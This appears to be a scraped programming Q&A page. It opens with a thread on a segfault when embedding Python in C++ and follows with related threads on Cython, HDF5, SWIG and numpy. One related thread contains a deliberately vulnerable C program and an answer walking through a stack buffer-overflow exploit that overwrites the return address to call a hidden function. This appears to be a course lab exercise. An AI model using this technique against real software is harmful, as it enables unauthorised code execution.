PyImport_Import segmentation fault after reading in TSV with C++ - python

I am using C++ as a wrapper around a Python module. First, I read in a TSV file, cast it as a numpy array, import my Python module, and then pass the numpy array to Python for further analysis. When I first wrote the program, I was testing everything using a randomly generated array, and it worked well. However, once I replaced the randomly generated array with the imported TSV array, I got a segmentation fault when I tried to import the Python module. Here is some of my code:
#define NPY_NO_DEPRECATED_API NPY_1_7_API_VERSION
#define PY_SSIZE_T_CLEAN
#include <python3.8/Python.h>
#include "./venv/lib/python3.8/site-packages/numpy/core/include/numpy/arrayobject.h"
#include <stdio.h>
#include <iostream>
#include <stdlib.h>
#include <random>
#include <fstream>
#include <sstream>
int main(int argc, char* argv[]) {
setenv("PYTHONPATH", ".", 0);
Py_Initialize();
import_array();
static const int numberRows = 1000;
static const int numberColumns = 500;
npy_intp dims[2]{ numberRows, numberColumns };
static const int numberDims = 2;
double(*c_arr)[numberColumns]{ new double[numberRows][numberColumns] };
// ***********************************************************
// THIS PART OF THE CODE GENERATES A RANDOM ARRAY AND WORKS WITH THE REST OF THE CODE
// // initialize random number generation
// typedef std::mt19937 MyRNG;
// std::random_device r;
// MyRNG rng{r()};
// std::lognormal_distribution<double> lognormalDistribution(1.6, 0.25);
// //populate array
// for (int i=0; i < numberRows; i++) {
// for (int j=0; j < numberColumns; j++) {
// c_arr[i][j] = lognormalDistribution(rng);
// }
// }
// ***********************************************************
// ***********************************************************
// THIS PART OF THE CODE INGESTS AN ARRAY FROM TSV AND CAUSES CODE TO FAIL AT PyImport_Import
std::ifstream data("data.mat");
std::string line;
int row = 0;
int column = 0;
while (std::getline(data, line)) {
std::stringstream lineStream(line);
std::string cell;
while (std::getline(lineStream, cell, '\t')) {
c_arr[row][column] = std::stod(cell);
column++;
}
row++;
column = 0;
if (row > numberRows) {
break;
}
}
// ***********************************************************
PyArrayObject *npArray = reinterpret_cast<PyArrayObject*>(
PyArray_SimpleNewFromData(numberDims, dims, NPY_DOUBLE, reinterpret_cast<void*>(c_arr))
);
const char *moduleName = "cpp_test";
PyObject *pname = PyUnicode_FromString(moduleName);
// ***********************************************************
// CODE FAILS HERE - SEGMENTATION FAULT
PyObject *pyModule = PyImport_Import(pname);
// .......
// THERE IS MORE CODE BELOW NOT INCLUDED HERE
}
So, I'm not sure why the code fails when ingest data from a TSV file, but not when I use randomly generated data.
EDIT: (very stupid mistake incoming) I used the conditional row > numberRows for the stopping condition in the while loop and so this affected the row number used for the final line in the array. Once I changed that conditional to row == numberRows, everything worked. Who knew being specific about rows when building an array was so important? I'll leave this up as a testament to stupid programming mistakes and maybe someone will learn a little something from it.

Note that you don't have to use arrays for storing the information(like double values) in 2D manner because you can also use dynamically sized containers like std::vector as shown below. The advantage of using std::vector is that you don't have to know the number of rows and columns beforehand in your input file(data.mat). So you don't have to allocate memory beforehand for rows and columns. You can add the values dynamically.
#include <iostream>
#include <vector>
#include <string>
#include <sstream>
#include<fstream>
int main() {
std::string line;
double word;
std::ifstream inFile("data.mat");
//create/use a std::vector instead of builit in array
std::vector<std::vector<double>> vec;
if(inFile)
{
while(getline(inFile, line, '\n'))
{
//create a temporary vector that will contain all the columns
std::vector<double> tempVec;
std::istringstream ss(line);
//read word by word(or double by double)
while(ss >> word)
{
//std::cout<<"word:"<<word<<std::endl;
//add the word to the temporary vector
tempVec.push_back(word);
}
//now all the words from the current line has been added to the temporary vector
vec.emplace_back(tempVec);
}
}
else
{
std::cout<<"file cannot be opened"<<std::endl;
}
inFile.close();
//lets check out the elements of the 2D vector so the we can confirm if it contains all the right elements(rows and columns)
for(std::vector<double> &newvec: vec)
{
for(const double &elem: newvec)
{
std::cout<<elem<<" ";
}
std::cout<<std::endl;
}
return 0;
}
The output of the above program can be seen here. Since you didn't provide data.mat file, i created an example data.mat file and used it in my program which can be found at the above mentioned link.

Related

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

Cython macro definition in structure

I'm using Cython to import a structure to python from C while there are some macro definitions which include functions. I just don't how to realize the structure in Cython.
typedef struct _SparMat {
int m, n;
int *rvec;
int *ridx;
double *rval;
int *cvec;
int *cidx;
double *cval;
int nnz;
int bufsz;
int incsz;
int flag;
#define MAT_ROWBASE_INDEX (0x00000001)
#define MAT_ROWBASE_VALUE (0x00000002)
#define MAT_COLBASE_INDEX (0x00000004)
#define MAT_COLBASE_VALUE (0x00000008)
#define CSR_INDEX(flag) ((flag) & MAT_ROWBASE_INDEX)
#define CSR_VALUE(flag) ((flag) & MAT_ROWBASE_VALUE)
#define CSC_INDEX(flag) ((flag) & MAT_COLBASE_INDEX)
#define CSC_VALUE(flag) ((flag) & MAT_COLBASE_VALUE)
} SparMat, * matptr;

Read string in HDF5/C++

I have stored a string (and a vector) in my HDF5 archive, for example with the Python interface:
import h5py
file = h5py.File("example.h5","w")
file['/path/to/vector'] = [0., 1., 2.]
file['/path/to/string'] = 'test'
Now I want the read the string to a std::string. I know how to read the vector (see below), but I have absolutely no idea how to read the string. What particularly don't understand is how to allocate the result, as:
The H5Cpp library does not seem to use the STL-containers, but rather raw pointers, requiring pre-allocation.
This is somewhat contradicted by the observation HDFView indicates the dimension size to be 1 and the type to be "String, length = variable".
Here is how I read the vector:
#include "H5Cpp.h"
#include <vector>
#include <iostream>
int main()
{
// open file
H5::H5File fid = H5::H5File("example.h5",H5F_ACC_RDONLY);
// open dataset
H5::DataSet dataset = fid.openDataSet("/path/to/vector");
H5::DataSpace dataspace = dataset.getSpace();
H5T_class_t type_class = dataset.getTypeClass();
// check data type
if ( type_class != H5T_FLOAT )
throw std::runtime_error("Unable to read, incorrect data-type");
// check precision
// - get storage type
H5::FloatType datatype = dataset.getFloatType();
// - get number of bytes
size_t precision = datatype.getSize();
// - check precision
if ( precision != sizeof(double) )
throw std::runtime_error("Unable to read, incorrect precision");
// get the size
// - read rank (a.k.a number of dimensions)
int rank = dataspace.getSimpleExtentNdims();
// - allocate
hsize_t hshape[rank];
// - read
dataspace.getSimpleExtentDims(hshape, NULL);
// - total size
size_t size = 0;
for ( int i = 0 ; i < rank ; ++i ) size += static_cast<size_t>(hshape[i]);
// allocate output
std::vector<double> data(size);
// read data
dataset.read(const_cast<double*>(data.data()), H5::PredType::NATIVE_DOUBLE);
// print data
for ( auto &i : data )
std::cout << i << std::endl;
}
(compiled with h5c++ -std=c++14 so.cpp)
I have found a solution:
#include "H5Cpp.h"
#include <vector>
#include <iostream>
int main()
{
// open file
H5::H5File fid = H5::H5File("example.h5",H5F_ACC_RDONLY);
// open dataset, get data-type
H5::DataSet dataset = fid.openDataSet("/path/to/string");
H5::DataSpace dataspace = dataset.getSpace();
H5::StrType datatype = dataset.getStrType();
// allocate output
std::string data;
// read output
dataset.read(data, datatype, dataspace);
std::cout << data << std::endl;
}

SWIG c++ vector access in python

This may be a noob question but here it goes. I have wrapped a 3d vector into a python module using SWIG. Everything has compiled and I can import the module and perform actions with it. I can't seem to figure out how to access my vector in python to store and change values in it. How do I store and change my vector values in python. My code is below and was written to test if the algorithm stl works with SWIG. It does seem to work but I need to be able to put values into my vector with python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED
#include <vector>
using namespace std;
struct myStruct{
int vecd1, vecd2, vecd3;
vector<vector<vector<double> > >vec3d;
void vecSizer();
void deleteDuplicates();
double vecSize();
void run();
};
#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
vec3d.resize(vecd1);
for(int i = 0; i < vec3d.size(); i++)
{
vec3d[i].resize(vecd2);
for(int j = 0; j < vec3d[i].size(); j++)
{
vec3d[i][j].resize(vecd3);
}
}
}
void myStruct::deleteDuplicates()
{
vector<vector<vector<double> > >::iterator it;
sort(vec3d.begin(),vec3d.end());
it = unique(vec3d.begin(),vec3d.end());
vec3d.resize(distance(vec3d.begin(), it));
}
double myStruct::vecSize()
{
return vec3d.size();
}
void myStruct::run()
{
vecSizer();
deleteDuplicates();
vecSize();
}
from the terminal (Ubuntu)
import test #import the SWIG generated module
x = test.myStruct() #create an instance of myStruct
x.vecSize() #run vecSize() should be 0 since vector dimensions are not initialized
0.0
x.vec3d #see if vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!
It turns out that vectors are converted to immutable python objects when the wrapper/interface is generated. So in short you cannot modify wrapped c++ vectors from python.

creating numpy array in c extension segfaults

I'm just trying to start off by creating a numpy array before I even start to write my extension. Here is a super simple program:
#include <stdio.h>
#include <iostream>
#include "Python.h"
#include "numpy/npy_common.h"
#include "numpy/ndarrayobject.h"
#include "numpy/arrayobject.h"
int main(int argc, char * argv[])
{
int n = 2;
int nd = 1;
npy_intp size = {1};
PyObject* alpha = PyArray_SimpleNew(nd, &size, NPY_DOUBLE);
return 0;
}
This program segfaults on the PyArray_SimpleNew call and I don't understand why. I'm trying to follow some previous questions (e.g. numpy array C api and C array to PyArray). What am I doing wrong?
Typical usage of PyArray_SimpleNew is for example
int nd = 2;
npy_intp dims[] = {3,2};
PyObject *alpha = PyArray_SimpleNew(nd, dims, NPY_DOUBLE);
Note that the value of nd must not exceed the number of elements of array dims[].
ALSO: The extension must call import_array() to set up the C API's function-pointer table. E.g. in Cython:
import numpy as np
cimport numpy as np
np.import_array() # so numpy's C API won't segfault
cdef make_array():
cdef np.npy_intp element_count = 100
return np.PyArray_SimpleNew(1, &element_count, np.NPY_DOUBLE)

Categories